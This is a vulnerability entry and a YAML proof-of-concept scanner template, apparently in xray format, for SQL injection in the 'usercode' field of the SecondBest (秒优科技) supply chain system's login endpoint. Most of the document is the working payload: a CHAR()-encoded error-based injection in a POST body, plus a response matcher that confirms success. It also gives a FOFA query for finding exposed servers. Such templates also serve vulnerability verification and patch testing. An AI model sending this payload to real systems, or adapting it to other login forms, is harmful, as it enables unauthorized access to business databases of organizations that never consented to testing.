漏洞描述
SecondBest Supply Chain Management System has a SQL injection vulnerability in the doAction login interface.
The vulnerability exists in the usercode parameter which can be exploited to perform SQL injection attacks.
FOFA: app="秒优科技-供应链管理系统"
secondbest-supply-chain-sqli: SecondBest Supply Chain Management System SQL Injection
PoC代码[已公开]
id: secondbest-supply-chain-sqli
info:
name: SecondBest Supply Chain Management System SQL Injection
author: ZacharyZcR
severity: high
verified: true
description: |
SecondBest Supply Chain Management System has a SQL injection vulnerability in the doAction login interface.
The vulnerability exists in the usercode parameter which can be exploited to perform SQL injection attacks.
FOFA: app="秒优科技-供应链管理系统"
reference:
- https://github.com/wy876/POC/blob/main/%E7%A7%92%E4%BC%98%E7%A7%91%E6%8A%80/%E7%A7%92%E4%BC%98%E7%A7%91%E6%8A%80-%E4%BE%9B%E5%BA%94%E9%93%BE%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FdoAction%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
tags: secondbest,sqli
created: 2024/12/31
rules:
r0:
request:
method: POST
path: /zh/login/doAction
headers:
Content-Type: application/json
body: |
{"usercode":"1'+(SELECT CHAR(83)+CHAR(87)+CHAR(119)+CHAR(105) WHERE 6635=6635 AND 2366 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2366=2366) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113))))+'","password":"1","remember":false,"ip":null,"city":null,"ISERP":"ISERP"}
expression: response.status == 500 && response.body.bcontains(b'qbbzq1qxkjq')
expression: r0()